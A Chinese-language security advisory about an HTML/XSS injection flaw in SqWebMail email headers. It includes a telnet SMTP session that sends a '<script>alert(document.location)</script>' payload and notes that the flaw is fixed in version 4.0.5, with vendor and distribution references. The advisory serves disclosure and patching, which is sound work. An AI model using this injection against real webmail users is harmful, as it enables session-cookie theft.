SqWebMail Email头字段HTML注入漏洞

漏洞信息详情

SqWebMail Email头字段HTML注入漏洞

漏洞简介

SqWebMail是一款基于WEB的邮件系统。
SqWebMail不正确过滤用户提供的EMAIL头字符串,远程攻击者可以利用这个漏洞进行跨站脚本攻击,获得敏感信息。
攻击者发送的一个EMAIL消息如果在头字段包含类似如下的HTML代码:
\”<script>alert(document.location)</script>\”:
ashanti@dns:~$ telnet localhost 25
Trying x.x.x.x…
Connected to x.x.x.x.
Escape character is \’\’^]\’\’.
220 x.x.x.x ESMTP
helo foo
250 x.x.x.x
mail from:<test test com>
250 ok
rcpt to:<user mediaservice net>
250 ok
data
354 go ahead
<script>alert(document.location)</script>
.
[…]
当目标用户查看时可导致恶意脚本代码在用户浏览器上执行,泄露基于验证的COOKIE等信息。
另外攻击者也可以发送MIME Content-Type字段中设置畸形内容的\”message/delivery-status\”,也可能触发漏洞。

漏洞公告

厂商补丁:
inter7
——
目前厂商已经在4.0.5版本的软件中修复这个安全问题,请到厂商的主页下载:

http://www.inter7.com/sqwebmail/sqwebmail.html” target=”_blank”>
http://www.inter7.com/sqwebmail/sqwebmail.html

参考网址

来源: BID
名称: 10588
链接:http://www.securityfocus.com/bid/10588

来源: GENTOO
名称: GLSA-200408-02
链接:http://www.gentoo.org/security/en/glsa/glsa-200408-02.xml

来源: DEBIAN
名称: DSA-533
链接:http://www.debian.org/security/2004/dsa-533

来源: SECUNIA
名称: 11918
链接:http://secunia.com/advisories/11918/

来源: XF
名称: sqwebmail-print-header-xss(16467)
链接:http://xforce.iss.net/xforce/xfdb/16467

来源: BUGTRAQ
名称: 20040621 XSS vulnerability in Sqwebmail 4.0.4
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=108786212220140&w=2

受影响实体

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享